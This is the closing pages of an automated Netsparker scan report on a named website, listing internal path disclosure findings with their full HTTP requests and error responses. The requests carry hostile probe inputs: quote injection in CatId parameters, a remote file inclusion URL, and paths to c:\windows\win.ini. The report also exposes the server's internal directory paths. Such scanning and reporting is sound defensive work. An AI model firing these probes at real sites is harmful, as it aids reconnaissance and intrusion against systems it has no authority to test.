Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Internal Server Error
Date: Tue, 20 May 2014 13:56:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 310
Content-Type: text/html
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
<font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font><p><font face="Arial" size=2>Type mismatch: 'CatID'</font><p><font
face="Arial" size=2>D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\PITGAM\../pagetop.asp</font><font face="Arial" size=2>, line 43</font>
19.10. /sipur/page.asp
http://www.shalomlaam.co.il/sipur/page.asp?CatId=
143 / 146
Identified Internal Path(s)
D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\SIPUR\../pagetop.asp
Certainty
Request
GET /sipur/page.asp?CatId= HTTP/1.1
Referer: http://www.shalomlaam.co.il/sipur/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Internal Server Error
Date: Tue, 20 May 2014 13:46:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 309
Content-Type: text/html
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
<font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font><p><font face="Arial" size=2>Type mismatch: 'CatID'</font><p><font
face="Arial" size=2>D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\SIPUR\../pagetop.asp</font><font face="Arial" size=2>, line 43</font>
19.11. /alon/mador.asp
http://www.shalomlaam.co.il/alon/mador.asp?CatId=%2527
Identified Internal Path(s)
D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\ALON\../pagetop.asp
Certainty
Request
GET /alon/mador.asp?CatId=%2527 HTTP/1.1
Referer: http://www.shalomlaam.co.il/alon/list.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Internal Server Error
Date: Tue, 20 May 2014 14:09:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 308
Content-Type: text/html
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
<font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font><p><font face="Arial" size=2>Type mismatch: 'CatID'</font><p><font
face="Arial" size=2>D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\ALON\../pagetop.asp</font><font face="Arial" size=2>, line 43</font>
19.12. /gallery/Default.asp
http://www.shalomlaam.co.il/gallery/Default.asp?id=0&page=hTTp%3a%2f%2fnetsparker.com%2fn
Identified Internal Path(s)
D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\GALLERY\../pagetop.asp
Certainty
Request
GET /gallery/Default.asp?id=0&page=hTTp%3a%2f%2fnetsparker.com%2fn HTTP/1.1
Referer: http://www.shalomlaam.co.il/gallery/Default.asp?id=0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
144 / 146
Response
HTTP/1.1 500 Internal Server Error
Date: Tue, 20 May 2014 14:16:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 310
Content-Type: text/html
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
<font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font><p><font face="Arial" size=2>Type mismatch: 'Cint'</font><p><font
face="Arial" size=2>D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\GALLERY\../pagetop.asp</font><font face="Arial" size=2>, line 86</font>
19.13. /ask/answer.asp
http://www.shalomlaam.co.il/ask/answer.asp?id=c%3a%5cwindows%5cwin.ini
Identified Internal Path(s)
c:\windows\win.ini&quot
Certainty
Request
GET /ask/answer.asp?id=c%3a%5cwindows%5cwin.ini HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

</style>
</head>
<font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font><p><font face="Arial" size=2>Type mismatch: '[string:
&quot;c:\windows\win.ini&quot;]'</font><p><font face="Arial" size=2>/ask/answer.asp</font><font face="Arial" size=2>, line 12</font>
19.14. /sipur/
http://www.shalomlaam.co.il/sipur/?CatID=%2527&page=2
Identified Internal Path(s)
D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\SIPUR\../pagetop.asp
Certainty
Request
GET /sipur/?CatID=%2527&page=2 HTTP/1.1
Referer: http://www.shalomlaam.co.il/sipur/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Internal Server Error
Date: Tue, 20 May 2014 14:18:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 359
Content-Type: text/html
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
<title> - - </title>
<font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font><p><font face="Arial" size=2>Type mismatch: 'CatID'</font><p><font
face="Arial" size=2>D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\SIPUR\../pagetop.asp</font><font face="Arial" size=2>, line 43</font>
19.15. /site/ask/answer_print.asp
http://www.shalomlaam.co.il/site/ask/answer_print.asp?tbl=ask&id=c%3a%5cwindows%5cwin.ini
Identified Internal Path(s)
c:\windows\win.ini&quot
Certainty
145 / 146
Request
GET /site/ask/answer_print.asp?tbl=ask&id=c%3a%5cwindows%5cwin.ini HTTP/1.1
Referer: http://www.shalomlaam.co.il/vod/vod.asp?id=1762
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

0">&nbsp;</td>
</tr> <font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font><p><font face="Arial" size=2>Type mismatch: '[string:
&quot;c:\windows\win.ini&quot;]'</font><p><font face="Arial" size=2>/site/ask/answer_print.asp</font><font face="Arial" size=2>, line 4</font>
146 / 146

Você também pode gostar